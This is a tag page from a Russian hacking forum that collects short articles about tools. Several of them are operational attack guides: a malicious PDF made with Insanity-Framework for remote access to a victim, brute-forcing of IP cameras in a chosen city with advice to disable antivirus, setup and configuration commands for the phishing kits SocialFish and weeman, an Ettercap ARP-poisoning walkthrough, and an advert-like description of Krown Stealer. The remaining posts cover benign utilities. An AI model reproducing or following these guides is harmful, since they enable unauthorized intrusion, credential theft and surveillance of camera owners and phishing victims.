Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'инструмент'.
-
Приветствую, хакеры! В данной статье я хочу рассказать про очень мощный инструмент для DNS-разведки. DNSRecon, как его называют сегодня, представляет собой Python-эквивалент скрипта Ruby, первоначально написанного Карлосом Пересом в конце 2006 года. По его собственным словам, этот инструмент в значительной степени возник из его личной потребности отражать сбор данных, связанных с DNS, в интуитивно понятном виде. В то время как версия Python позволила ему попрактиковаться в вновь приобретенных навыках работы с языком программирования. Установка: Установите пакет git, если он недоступен (например, sudo apt install git) и python3-pip для выполнения требований к управлению пакетами для Python. Клонируйте исходный архив в желаемое место на диске: git clone https://github.com/darkoperator/dnsrecon.git python3-pip install -r requirements.txt --no-warn-script-location python3 dnsrecon.py -h Очень простой в освоении инструмент, поэтому если вам необходимо работать с DNS, то рекомендую пользоваться этой утилитой. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Когда речь заходит о тестировании веб-приложений "черным ящиком", одно из основных действий - перебор возможных путей для поиска новых точек входа и "забытых" данных. То есть, берется какой-либо список популярных названий директорий (вроде /uploads/) и файлов (data.txt, file.php и т.п.) и осуществляется последовательный перебор. Техника известная, старая как мир, под нее существует множество утилит, множество публичных списков. Из наиболее популярных можно отметить следующие утилиты: dirb (http://dirb.sourceforge.net/)wfuzz (https://github.com/xmendez/wfuzz)DirBuster (https://sourceforge.net/projects/dirbuster/)nikto (https://github.com/sullo/nikto)dirsearch (https://github.com/maurosoria/dirsearch)nmap (модуль http-enum) (https://nmap.org)Metasploit Framework (модули dir_scanner, files_dir) (https://www.metasploit.com/)Burp Suite (с помощью Intruder) (https://portswigger.net/burp)Тысячи их. Лично я предпочитаю wfuzz (быстро работает, удобная фильтрация ответов веб-сервера по нескольким критериям), либо Burp Suite. Популярных списков для перебора не меньше, чем утилит, так как каждая зачастую идет с каким-либо списком по умолчанию. Из сторонних можно отметить: SecLists (раздел Discovery -> Web-Content) (https://github.com/danielmiessler/SecLists)PayloadsAllTheThings (немного и раскидано по файлам) (https://github.com/swisskyrepo/PayloadsAllTheThings)FuzzDB (раздел discovery -> predictable-filepaths) (https://github.com/fuzzdb-project/fuzzdb)Практически каждый пентестер составляет и поддерживает свой подобный список, и не один, а множество: наиболее полный, наиболее продуктивный и краткий (по аналогии с идеей top1000 открытых портов в nmap), бесконечное количество под конкретные веб-технологии, фреймворки и CMS. Я тоже потратил некоторое время на составление подобных листов и хотел бы ими поделиться, причем не общими, а под некоторые известные веб-интерфейсы управления БД (вроде phpMyAdmin) и менеджеры файлов (даже не знаю, какой пример привести, чтобы действительно известный). Как показывает практика, многие пренебрегают такими специализированными листами. Списки сделал под следующие продукты: phpMyAdmin (https://github.com/phpmyadmin)Adminer (https://github.com/vrana/adminer)PHP Mini SQL Admin (https://sourceforge.net/projects/phpminiadmin/)Sypex Dumper (https://sypex.net)phpFileManager (https://www.dulldusk.com/phpfm)tinyfilemanager (https://github.com/prasathmani/tinyfilemanager)extplorer (https://extplorer.net/)FileRun (http://www.filerun.com/)Encode Explorer (https://sourceforge.net/projects/encode-explorer/)phpLiteAdmin (https://www.phpliteadmin.org/)
-
Первоначально формат PDF был разработан компанией Adobe для федеральных властей США. Сейчас же PDF-файлы широко используются в управлении производством, сфере различных финансовых услуг, образовательных учреждениях и т.д Именно поэтому в данной статье мы разберемся, как получить удаленный доступ к целевому компьютеру с помощью вредоносного PDF. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: apt-get update && apt-get upgrade Устанавливаем git: apt-get install git Далее клонируем репозиторий с помощью команды: git clone https://github.com/4w4k3/Insanity-Framework Переходим в директорию: cd Insanity-Framework Делаем скрипт установки исполняемым и запускаем: chmod +x install.sh ./install.sh После выполнения вышеперечисленных команд будет запущен процесс установки инструмента и всех необходимым компонентов для правильной работоспособности. Как только установка будет завершена, появится окно программы, где будет предложено нажать клавину «Enter» для продолжения. Нажимаем данную клавишу и попадаем в главное меню утилиты, в котором выбираем цифру 1 для создания полезной нагрузки, а после выбираем цифру 5 для генерации вредоносного PDF. Далее инструмент покажет полный путь, куда был сохранен PDF-файл, и предложит запустить слушателя. Теперь осталось отправить вредоносный PDF-файл нашей жертве. После того, как жертва запустит этот файл, мы получим сессию для удаленного управления взломанным компьютером. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Благодаря сегодняшней статье вы полностью оборудуете свой браузер от всех видов слежения. 1. Privacy Badger Инструмент бесплатный и с открытым исходным кодом. Он распознаёт 16 типов рекламных трекеров и обрезает им доступ к вашему браузеру. 2. Ublock Origin Также запрещает рекламные трекеры и ссылки для отслеживания. 3. User-Agent Switcher Меняет отпечаток браузера и тип устройства. Помимо улучшения приватности мы также можем изменить поведение веб-страницы, притворившись специфическим девайсом. Например, Инстаграм позволяет загружать фотографии только с мобильного устройства. Соответственно, чтобы загрузить изображения с компьютера, нужно изменить user-agent на один из используемых смартфонами. 4. Chaff Если вы хотите затруднить жизнь тому, кто отслеживает ваш сетевой трафик, или сделать собираемые данные менее полезными, попробуйте расширения наподобие «Chaff», которые предназначены для генерирования поддельного трафика. Согласно установленным правилам, Chaff будет посещать сайты в случайном порядке, начиная с указанных вами. Можно указать другие параметры с той целью, чтобы сделать трафик более или менее реалистичным. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Сейчас я хотел бы рассмотреть два интересных способа скрытия данных в аудиофайле. В первом случае мы воспользуемся утилитой DeepSound — той самой программой, которую использовал Эллиот в сериале “Мистер Робот” для скрытия данных на дисках с музыкальными альбомами. С программой справиться даже последний ламер: в верхней части нужно добавить обычный аудиофайл - это может быть допустим музыка или подкаст, а в нижней части те самые секретные файлы, которые нужно спрятать. Допустим необходимо скрыть приватный ключ от биткоин кошелька. Для этого в верхней части программы нажимаем кнопку “Open carriers files” и выбираем любой аудиофайл. Ну а теперь добавляем наши секретные файлы кнопкой “Add secret files” , после чего нажимаем на “Encode secret file” и указываем пароль для доступа. В итоге мы получаем аудиофайл, который выглядит и воспроизводится как обычная музыкальная запись. Ну и для расшифровки нужно также выбрать наш зашифрованный аудиофайл кнопкой “Open carriers files”, ввести пароль если ранее вы его устанавливали, после чего нажать на “Extract secret file”. На выходе мы получаем те самые зашифрованные файлы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Сначала разберёмся какие типы видов камер бывают: IP камеры - это камеры к которым можно подключиться через интернет. (Работают с интернетом Локальные камеры - это камеры к которым невозможно подключиться через интернет. Они никак не будут задействованы в интернет. (Работают без интернета) Теперь я вам покажу и расскажу как находить IP камеры. Для начала нам понадобиться необходимый софт для брута, чека и просмотра. Сперва нам нужно будет скачать архив. Там весь необходимый софт для работы. Если же вы не хотите скачивать мой архив со сборником программ, тогда в путь за поиском необходимых программ ! Скачиваем архив: СКАЧАТЬ KPortScan - https://www.virustotal.com/gui/file...434032842339f0ba38ad1ff62f72999c4e5/detection iVMS-4200 - https://www.virustotal.com/gui/file...379b736524606fc52e7fc27b978f13c749b/detection HIKKA - https://www.virustotal.com/gui/file...ecc27f76bd501d73b1265021069e653c1ba/detection Внимание! Перед распаковкой отключите антивирус и добавьте KPortScan в исключения. Так как именно на него антивирус ругается. Вирусов нету Распаковываем архив в любую папку. И нас встречают 3 программы. Что они делают эти три программы ? KPortScan - Брут IP камер HIKKA - Чек IP камер iVMS-4200 - Просмотр IP камер Что такое брут и чек? Брут (Brute) - Добыча чего-либо Чек (Check) - Проверка чего-либо (в данном случае проверка с помощью логина и паролей) Сперва нам нужно открыть сайт. Вот он: https://4it.me/getlistip Вписываем туда город, который хотим взломать на камеры! В моём случае например это будет российский город "Тверь" Копируем IP-диапазоны, и открываем KPortScan и вставляем туда скопированные IP-диапазоны. В списке выбираем "RUSSIAN FEDERATION" Далее в "Port" пишем значение "8000" И нажимаем кнопку "Start" Внимание! Перед тем как нажимать кнопку "Start", сверьтесь со скрином как у меня, чтобы у вас потом не возникло ошибок! Как сверили свои значения с моим скрином, чтобы они совпадали, смело нажимаем на кнопку старта! Ну и теперь осталось дождаться окончания чека. При чеке интернет у вас будет нагружен довольно сильно. Так что приготовьтесь к этому испытанию) После завершения и вас будет отображено количество найденных IP камер. Закрываем KPortScan и открываем файл results.txt Там будут найденные камеры. Копируем все найденные камеры из файла results.txt и открываем папку с программой под названием "HIKKA" Открываем файл "hosts" и скидываем скопированные камеры туда. Сохраняем и запускаем файл "start.bat" Теперь ждём когда будет зелёная строка, это будет означать что камера найдена! Пример найденной камеры: Как только HIKKA нашла камеру, идём устанавливать программу "iVMS-4200" Кстати, чуть не забыл, когда HIKKA нашла камеру, в папке pics будут фотки самой камеры, а в названии данные об камере. Как только установили программу "iVMS-4200", открываем. Если у вас английский язык, то нажимаем вверху "Help->Language->Русский Далее открываем вкладку "Управление устройством" и нажимаем на кнопку "Добавить" Вводим любой псевдоним. Вводим адрес (пример: 91.238.24.219) Вводим пользователя и пароль Если вы запутались, то сверьтесь как у меня на скрине: После ввода необходимых данных нажимаем на кнопку "Добавить" После успешного импорта камеры, переходим во вкладку "Основной ракурс" И видим что появилась новая папка с вашим псевдонимом камеры. Открываем папку, и нажимаем на камеру 2 раза левой кнопкой мыши, или же просто перетягиваем камеру чуть правее. Ну вот и всё! Что делать дальше вам решать.. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
О, брат, ты снова зашёл на мою статью? Окей, значит ты зашёл именно туда, куда нужно. Сейчас я хочу познакомить с фишинговым инструментом SocialFish. Он позволяет легко создавать фейк-страницы самых популярных веб-сайтов, таких как Instagram, Twitter, Github и т.д. Установка Клонируй это из Github в Termux. git clone https://github.com/An0nUD4Y/SocialFish.git Перейди в папку SocialFish, установите требования, измените режим файла python и выполните: cd SocialFish apt install python3-pip // Если не установлено pip3 install -r requirements.txt // Если не установлено chmod 777 SocialFish.py ./SocialFish.py Возможно, у вас появится вот такая ошибка. Если она у вас появилась, то делаем следующее: pkg up pkg install curl pkg install php Соглашаемся и продолжаем: После установки мы запускаем SocialFish заново и соглашаемся: После того, как вы ответите на вопросы, вы увидите доступные варианты страниц: FACEBOOK PHISHINGИНСТАГРАМ ФИШИНГСНАПЧАТ ФИШИНГYAHOO PHISHINGДВИЖЕНИЕ ФИШИНГАMICROSOFT PHISHINGПАРНЫЙ ФИШИНГВК ФИШИНГICLOUD ФИШИНГ Можете использовать любой. Ничего сложно в этом нет. Предупреждаю, что данная статья предназначена лишь для ознакомления и не призывает к действиям.
-
Зайти в Windows можно при помощи паролей или же благодаря смарт-картам. Администратор проводит настройку таким образом, чтобы компьютер делал запрос на определенную смарт-карту, которая дает доступ к Операционной системе. Метод двухфакторной аутентификации заключается в том, что человек должен знать не только какой-либо код доступа, но и обладать вещью для разблокировки, в данном случае – смарт-карта. Только при необходимом сертификате смарт-карта даст возможность ввода пин-кода, после чего пользователь может запустить операционку. Во время настройки пользователя, на домен устанавливается атрибут, который необходим для работы аутентификации с помощью смарт-карты, к данному пользователю приписывается какой-то NT-хэш. Значения данного хэша устанавливается случайно и в будущем никак не изменяются. Контроллер домена во время проведения аутентификации пересылает данный хэш в узел, подключение к которому производится. Атака Pass the hash Уязвимость работает по данному принципу: мошенник получает тот самый NT-хэш и благодаря нему проводит аутентификацию, используя способ pass the hash. Узнав данную информацию, злоумышленнику не нужно будет иметь смарт-карту или пин-код для получения доступа. А т.к. хэш в будущем неизменен, то злоумышленник получается возможность подключаться к ресурсам в любой момент времени. Для получения хэша используется инструмент Mimikatz прямо на сетевых узлах, со сценариями от 1 до 3. Помимо хэша и соответственно пароля учетной записи, можно узнать реальный пин-код смарт-карты. Запуская на сетевых узлах инструмент Mimikatz, появляется возможность копирования всех данных с привилегированных учетных записей, даже в случае использования двухфакторной аутентификации. Авторизация в данной операционной система построена так, что не получив прямого доступа к пользователю администратора, он получит хэш. А если он неизменен, то позволяет использовать его на прочих узлах сети. Данный методы дают возможность использования атаки и обхода данного метода защиты. Защита от уязвимости Windows 10 имеет в своем арсенале Remote Credential Guard, необходимая для защиты пользователей, во время удаленной работы. Данная вещь повышает безопасность, при попытке использования атаки.
-
Привет, хакеры, в статье расскажу о программе написанной на языке Python, которая помогает расширить существующий набор инструментов мониторинга безопасности рабочих станций или серверов, а также для автоматизирования быстрого сканирования вирусов. Режимы Распознавание последней точкиСканирование вирусовЖурналы событийSysmonWatchdogTShark Принцип работы: 1. Уведомление приходит из одного источников перечисленных выше. 2. Уведомление проходит проверку на валидность в config / ecxeptions / exception.json, где находятся все уведомления, на которые не нужно обращаться внимания. Если необходимо распознать последнюю точку, то необходимые уведомления игнорируется при помощи ПО. Чтобы сканировать вирусы нужно вручную добавить исключения в систему. 3. Если уведомление есть в exception.json, то возвращаемся к первому пункту, если нет, то идем дальше. 4. Если включен режим обучения, то появляется окно с предупреждением, где у вас спрашивают, собираетесь ли вы игнорировать уведомление, если да, то прописываем все данные для этого. 5. Если хотите пропустить выбор исключений, то переходим к следующему шагу. 6. Уведомление юзера о времени захвата. Делаем вывод: Уведомление в виде всплывающего окно появляется только, если работает мышь и компьютер ничем не блокируется. Все предупреждения сохраняются в виде текстового файла с расширением .txt Скачать данную программу и подробнее ознакомится с ней, можно по ссылке - https://github.com/yarox24/attack_monitor#supported-os
-
Привет, хакер, в данной статье разберем интересную программу Krown Stealer, можно догадаться, что это стиллер и он обладает весьма обширным списком функционала: Кража любых данных из множества популярных и известных браузеров.Кража сессии в стимКража сессии в FileZillaКража сессии ТелеграмСоздание скриншота с зараженного устройстваГраббер файлов с компьютера имеющие расширения .txt, .doc, .docx, а также доступ к изменению названия файла и его расширенияДва вида детектера, позволяющие обрабатывать логи ввода определенные запросы. Можно устанавливать собственные ссылки. От зараженного устройства можно узнать огромное множество информации: Разрешение экранаИнформация об операционной системеИП-адресИнформацию о процессореРаскладка клавиатуры и данные по установленным языкамКоличество ОЗУСоздание юзер агентов для браузера жертвыМестоположение жертвы и информация о его стране, регионе, городе и прочая информацияИнформация о провайдере Некоторый функционал можно подстраивать под себя и включать по желанию опции: Анти-СНГ не позволит запуск данной программы в странах СНГАнти-Виртуалка не позволит запускать этот софт на виртуальных машинахMutex, специальная защита не позволяющая повторно запускать инструмент. Стиллер работает как на 32-битных устройствах, так и на 64-битных. Информация отправляется прямиком вам в телеграм, никаких хостов и утомительных настроек. Программа не имеет в себе никакий библиотек и не засоряет систему, создавая минимальное количество запросов в интернет. Интересная функция – самоуничтожение, когда лог будет отправлен. После выполнения работы стиллер не оставит никаких следов прибывания. Программа имеет специальную технологию, которая позволят становится невидимым практически для всех антивирусов. Обнаруживается лишь в редких случаях.
-
- krown stealer
- стилер
- (and 11 more)
-
Приветсвую, хакеры, в данной статье расскажу об аналоге обычной файловой системе, которая имеет отличительную черту – pingfs. Ее фишкой является сохранение всей информации в сети, в виде ICMP пакетов, которые отправляется от пк к серверам. Сервис создан при помощи API и Filesystem in userspace. Значит, что для запуска данной системы необходимы права superuser. Единственная операционная система поддерживающая данный тип файловой системы – Linux. Поддержка есть как у протоколов IPv4 так и IPv6. Работа с сервисом Чтобы скомпилировать сервис нужно прописать make в папке с инструментом. Для начала использования, нужно: Создать текстовый документ, название который установить в соответствии в название хоста и ип-адресомВключить инструмент с полученными рут-правами, сделав при помощь команды: ./pingfs “название документа” ”точка монтирования”. После программа начинает сканировать хосты на верность реакции, отправляя сразу несколько пингов. На экране выводятся некие данные и статистика, после чего файловая система будет успешно смонтированаПрограмма не закрывается и продолжает создавать динамику отправки пакетов и байтов постоянно.Для прекращения работы инструмента: Нажимаем Ctrl + CЕсли же не работает, пишем fusermount –u. Возможные операции Сохранение и удаление файловИх списокИзменения названияЧтение и записьНастройка и изменения прав доступаНевозможные операции Сохранение и удаление каталоговСохранение ссылок на файлыОтметкиСоздатель системы говорит, что сегодня скорость локальных хостов очень маленькая. Часто передача информации грозит потерей пакетов, поэтому стоит с осторожностью относится к данной файловой системе.
-
Ettercap – программа предназначенная для сканирования сетевого трафика, который проходит через ПК, имея специальные опции. Приложение способно проводить атаки “man in the middle”, которое вынуждает другое устройство отсылать пакеты не роутеру, а прямо вам. Wireshark – популярная утилита, позволяющая перехватывать и сканировать трафик, является стандартной программой для образования и troubleshooting. Она поддерживает огромное множество протоколов, что делает ее универсальным инструментом, прибавляя к этому удобный интерфейс и сильнейшие фильтры Атака “Man In The Middle” – одна из атак криптографии, при которой взломщик крадет и изменяем сообщения, используемые для обмена информацией между корреспондентами, примечательно тем, что никто не догадывается об изменениях. Итак, первым делом необходимо установить подключение с сетью. Далее включаем первую программу, она имеет собственный интерфейс. Необходимо узнать, какие ип-адреса подключены к данной сети. Переходим в Sniff и там выбираем unified sniffing В данном разделе необходимо определиться с типом сети, которая будет отслежена. Нам необходима беспроводная сеть. Готово, теперь доступен специальный функционал. Необходимо выбрать Host, далее Scan for hosts. Когда сканирование будет завершено, переходим в список всех хостов, найденных на данном этапе. Что их увидеть переходим в Hosts – Hosts list Здесь выбираем: 1. Ип-адреса, необходимые для отслеживания 2. Устанавливаем слежу на них, нажатием Add to Target 1 и Add to Target 2 Далее входим в Mitm – ARP poisoning, где включаем опцию sniff remote connections, и конечно же начинаем отслеживание, нажав на кнопку Start Теперь запускаем вторую программу списка – Wireshark Данный способ атаки, совершаемый именно этими инструментами, можно совершать только на сайты, находящиеся на незащищенном протоколе – http. С протоколом https не выйдет. Не забывайте, что подключаясь к общественной сети, тоже можете подвергнутся хакерской атаке. Методы защиты: 1. Не допускайте возможности подключения к вашей сети неизвестных 2. Во время использования общественных сетей, не забывайте об возможно кражи ваших паролей. 3. Пользуйтесь VPN, подобные технологии помогут обезопасить вас от множества видов атак 4. Лучший способ защиты – сертификат SSL Надеюсь информация полезна и поможет вам избежать подобных атак или успешно провести их. К действиям не призываю!
-
Привет, хочу рассказать в данной статье как андроид устройство легко превращается в мощный инструмент для фишинга. Фишинг – подмена данных, для заполучения личной информации пользователя. Для этого понадобится программа – kali linux-weeman. Сейчас вы подумали, что за хрень, ведь я говорил об андройде. Все верно, первым делом устанавливаем пожалуй лучшую консоль для андроида – termux. Он является одним из лучших эмуляторов линукса. После скачивания открываем его. Для повышения комфорта работы устанавливаем Hacker’s Keyboard. Для подготовки к установке прописываем в termux несколько команд: $ apt update $ apt install Необходимо стабильное интернет-подключение, от этого будет зависеть скорость выполнения операции, после этого прописываем: $ apt install git Как мы видим у нас появляется вопрос, хотите ли вы продолжить? Для согласия пишем букву – y. Переходим к следующей команде: $ apt install python2 Появляется абсолютно такой же вопрос, на него тоже нужно дать согласие. Данная команда устанавливает язык программирования – python, именно он позволяет работать программе weeman. Подготвка к установке завершена, устанавливаем weeman: $ git clone https://github.com/evait-security/weeman Далее прописываем: $ ls Видим содержимое каталогов: После ввода команды не появилось никаких надписей? Вам стоит заново пройтись по предыдущим пунктам, если все работает, переходим дальше: $ cd weeman $ ls Образовались данные файлы, стартуем weeman $ python2 weeman.py Успешная установка, переходим к следующим пунктам. Необходимо вывести консоль, делается при помощи данного кода: $ help Далее устанавливаются определенные настройки, делаю на примере Yandex Вводим несколько строк: $ set url https://yandex.ru $ set port 8080 $ set action_url https://yandex.ru Первая команда необходима для установки адреса сайта, который будет скопирован. Вторая команда нужна для установки порта. Третья строка выбирает адрес, на который будет произведена переадресовка жертвы. Для проверки настроек прописываем этот код: $ show Далее запускаем: $ run Как мы видим все работает, адрес сервера. Копируем данный адрес и прописываем в браузере. Предупреждаю, что вся информация предоставлена лишь для ознакомления, не призываю к действиям. За выполнение подобных схем вы можете понести реальное уголовное наказание, поэтому выполняйте подобные действия лишь на свой страх и риск.
-
- хакерский инструмент
- инструмент
- (and 12 more)
-
Приветсвую, в данной статье немного расскажу о приложении, разработанным специально для аналитиков вредоносного кода. Программа является инструментов по автоматизации данного процесса, она позволяет быстро собирать, сравнивать и составлять отчеты о действиях, выполнявшие бинарный файл, работая в системе. Собственно данной программой является – SysAnalyzer Компоненты данного приложения работают на основе сравнений частей системы за определенный промежуток времени. Для этого используется механизм снапшотов, он оказывается куда эффективнее журналирования, т.к. занимает намного меньше объема памяти для извлечения информации. Во время мгновенных снимков легко распознаются различные изменения системы, после включения определенных программ и утилит. Целевые исполняемые файлы запускается в том же режиме что и система. Во время сканирования вредоносной программы, вы должны знать, что будет происходить тестовое заражение системы. Программа создает снимки несколько системных атрибутов: Запуск процессовПортыЗагрузка dllЗагрузка системный драйверовСнимок необходимых ключей реестраПрограмма станет незаменимым инструментом при сканировании различного вредоносного кода.
-
- анализатор
- вредоносный код
- (and 12 more)
-
Приветствую, рассмотрим программы и различные инструменты которые помогут вам в реверсе. Detect It Easy Данная утилита поможет определить упаковщик, имя при себя большой запас опций и функционала. К примеру, она может увидеть этропию секций файлов, это даст возможность узнать есть ли шифрование. ExeInfoPE Очередной распознаватель упаковщиков. Его интерфейс немного неудобный, может не понравится. Но плюсы есть, например постоянная поддержка программы, большое количество полезных функций и подсказки во время распаковки. На самом деле, я бы хотел порекомендовать новичкам данную утилиту. Имеется несколько автоматических распаковщиков, есть большое кол-во подсказок, по снятию защиты. А также имеются все обыденные возможности, просмотра заголовков файлов, секции, hex просмотрщик и несколько других встроенных программ. Поддерживаются плагины. HxD Бывают ситуации когда необходимо обратиться к нашему винчестеру в режиме бинара. Для этого созданы 16-ричные редакторы, данная программа является примером. Постоянная поддержка, бесплатное использование, поддержка многих форматов, отлично выполняет свою работу и имеет неплохой интерфейс. Имеются и некоторые особенности, например полное удаление информации. Также если хотите носите на флешке эту программу, то сделать это возможно с помощью портативной версии. HIEW Шестнадцатеричный редактор, который имеет за своей спиной огромную историю, но это не мешает ему обновляться дальше. Есть как платная, так и бесплатная версия. Интерфейс выглядит весьма старинно, но привыкнуть к нему можно быстро. Также есть функция работы только с клавиатуры. Pestudio Программа, позволяющая анализировать различные малвари. Программа сама отправляет файл на сканирование через вирус тотал, показывает таблица импорта, какие-то следы от вирусов, данные о заголовках. Коротко говоря, антивирусная машина, которая позволяет сканировать множество файлов и получать развернутую информацию о них. Fakenet-NG Эмулятор работы сети, это полное предназначение программы. Во время сканирования образцов малвари зачастую необходимо прогонять через все сетевые обращение, DNS HTTP, заниматься сниффингом, узнать ип-адреса серверов. Данная программа поддерживается и по сей день, работает на многих операционных системах. RegShot Утилита, следящая за изменениями в реестре. Запоминает все изменения, показывает где они произошли. TCPView Небольшой инструмент для контроля над сетевой активностью приложений. Список открытых портов, протоколы, различные счетчики пакетов. Безусловно важнейший инструмент взломщика. Resource Hacker Известная программа позволяющая изменить различные ресурсы. С помощью нее можно редактировать: манифест текстовые диалоговые строки, информацию курсора и т.д. Это не самые частые действия, но все же такая программа в арсенале очень пригодится.
-
Ежедневно хакерские инструменты обновляются и пополняются, поэтому будет преступление, не рассказать о инструменте Silent Trinity. Что это и зачем необходимо Профессионалы из PT ESC прибавляют знаний в продукцию компании, обучают обнаружению tactics, techniques и procedures атак. Значит очень важно будет рассказать о весьма многофункциональном инструменте – Silent Trinity. Более того, эти же эксперты уже выявлены случаи применения данного инструментария. Framework post exploitation данного инструмента обновился до версии 0.3.0. Главные особенности обновления - это его архитектура и онлайн режим. Взломщикам нравится framework, из-за использования DLR-имплантов. Огромная гибкость и анонимность получает инструмент от DLR-имплантов, если сравнивать с C Sharp. В данный момент общение с пользователем осуществляется через 4 различные транспортировки – HTTP, HTTPS, DNS, WMI Принцип работы нового Silent Trinity Silent Trinity был многократно исследован, для получения способов его обнаружения, вывод не утешительный. Как минимум инструментарий обнаруживается как на хосте, так и во время сетевой взаимосвязи. Взглянем на второй способ обнаружения. Стандартный при этом метод транспортировки – HTTPS. Запускаясь первый раз, создается поддельный сертификат, который помогает взаимодействовать с системой. Данный сертификат всегда одинаков. Необычность сертификата также является срок его действия в 9999 дней. DLR-имплант способен стартануть с помощью powershell, msbuild и даже wmic. Появляется файл, запускающийся благодаря одной из программ. Неважно какой способ запуска мы выберем, внутри файла всегда будет присутствовать объект формы Base64. Он помогает доставлять запросы, для создания полезной нагрузки, чтобы была возможность транспортировки. Пользователь получает ее и делает необходимые манипуляции. Данный метод при использовании DLR-имплантов довольно сложно выявить, но есть варианты вычисления трассировки событий с помощью event tracing for windows. Это помогает нам увидеть использование языка Boo, именно на нем написаны все импланты программы и ее модули. Это питон-подобный язык, но встречается крайне редко. Как мы видим, новая версия инструмента дает нам немало преимуществ и уникальных функций.
-
Приветствую, хочу поделится весьма необычной файловой системой πfs, находящаяся на гитхабе - https://github.com/philipl/pifs Она работает без жестких дисков, данные хранятся в π. Вам не послышалась, любые существующие или нет файлы сохраняются в числе, значит, что хранилище никогда не закончится и сжатие файла достигает ста процентов. Сборка очень легка. Сначала устанавливаем autoconf, automake и libfuse, для примера покажу этот процесс на Debian: π file system легок в использовании: meradara directory – это то места, где он сохраняет метаданные, а mountpoint – эта точка монтирования вашей стандартной файловой системы. Связь π и данных π – важнейшая математическая константа, о невероятных качествах вы узнаете на Вики. Главное отличие – оно полностью нормальное, все цифры его записи нормально распределены. Они образуют дизъюнктивную последовательность (подробнее на Википедии) значит, что число содержит любой порядок чисел. Это свойство работает в шестнадцатеричной системе исчисления, следовательно, она позволят найти что хочешь. Этот факт всплыл в далеком 2001 году. Какой смысл тратить много жестких дисков, если необходимые файлы уже в π? Совсем любой? Абсолютно, любые возможные сведения, ваши, чужие и несуществующие. Нет ограничений в авторских правах, ведь это просто символы из π, которые существовали до авторских работ. Как обнаружить нужные данные? Узнав начальную цифру вашего файлика, их количество, то без проблем найдете с помощью формулы Бэйли-Боруэйна-Плаффа. Советую разбивать на блоки, если данных достаточно много, чем длиннее порядок, тем дольше будет процесс. Нашел необходимые байты, но как запомнить их местонахождение? Можете записать в свой блокнотик, можно и в π. Местоположение это метаданные, забыв их, из π они не исчезнут.
-
- файловая система
- данные
- (and 9 more)
-
В данной статье расскажу почему не стоит нигде показывать свой ип адрес. А также покажу сервисы, которые помогут узнать какую-то информацию об айпишнике. Опасность IP-адреса Начну рассказ с весьма необычным раскладом. Уверен вы знаете отдел К. Именно тот отдел, занимающийся кибер преступлениями. Представим такую ситуацию, вы взламываете сайт. Большой и толстый сайт. Потом нашли дырку в системе, смогли подключиться, но оказывается не включили различные средства защиты, как прокси и впн. Из-за огромного желания срубить много денег. Конечно первое время все будет хорошо, наслаждение жизнью. Вычислив вас, наряд будет ожидать. Как не удивительно, за подобные преступления отвечает отдел К. Теперь переходим к более стандартному примеру, допустим как зная IP-адрес узнать оператора. Чтобы это сделать необходимо использовать данный ресурс - https://www.reg.ru/whois/. С помощью него можно узнать регистрационные данные, оператора и т. п. Показывает вам большую строку информации об айпи. Всего в пару кликов возможно получить немало данных, используя один ресурс. Сейчас расскажу о парочке других сайтах, которые дадут возможность получить информацию о IP. Htmlweb.ru – сервис помогает определить местоположение IP-адреса. Также предоставляет информацию о провайдере, телефоне и т. п. Getipintel.net – ресурс помогает определить вероятность использования средств анонимность у айпи-адреса Ip-score.com – сайт поможет узнать связь между вашим айпи, и причастность к спам-атакам Ipqualityscore.com – Проверяет айпишник на использование различных средств по типу: прокси и впн. Неплохая информация и подборочка ресурсов, которая поможет не только в черных делишках, но и в вашей же безопасности. Вы сможете узнать какую-то открытую информацию и сделаете определенные выводы.
-
Всем привет, данная статья будет совсем не большой и даже не очень информативной. Но надеюсь я смогу донести до вас крупицу информации и это возможно натолкнет вас на дальнейшее изучение данной тематики и подобных инструментов. Итак, Ruler является инструментом, написанном на таком языке программирования, как Go (скорее всего никто о нем не знает), необходим он для взаимосвязи с Exchange-серверами при помощи протоколы HTTP и MAPI. Главной задачей является злоупотребление правилами почты на основе Outlook клиента, об этом было написано в данном блоге - https://silentbreaksecurity.com/malicious-outlook-rules/ Особенности инструмента: Пересчет действительных юзеровПросмотр свежих правил настроек почтыСоздание новейших вирусных правил почтыУничтожение определенных правил почты Включая это, Ruler пытается в режиме полуавтомата устанавливать взаимосвязь с Exchange, а также пользоваться сервисом Autodiscover, чтобы обнаружить нужные данные. Вот один из подобных примером брут-атаки: А также как пример получения shell Написал все, что планировал, если вы собираетесь дальше ознакомиться с этим, то можно почитать об этом в блоге создателей данной программы, ссылочка - https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/
-
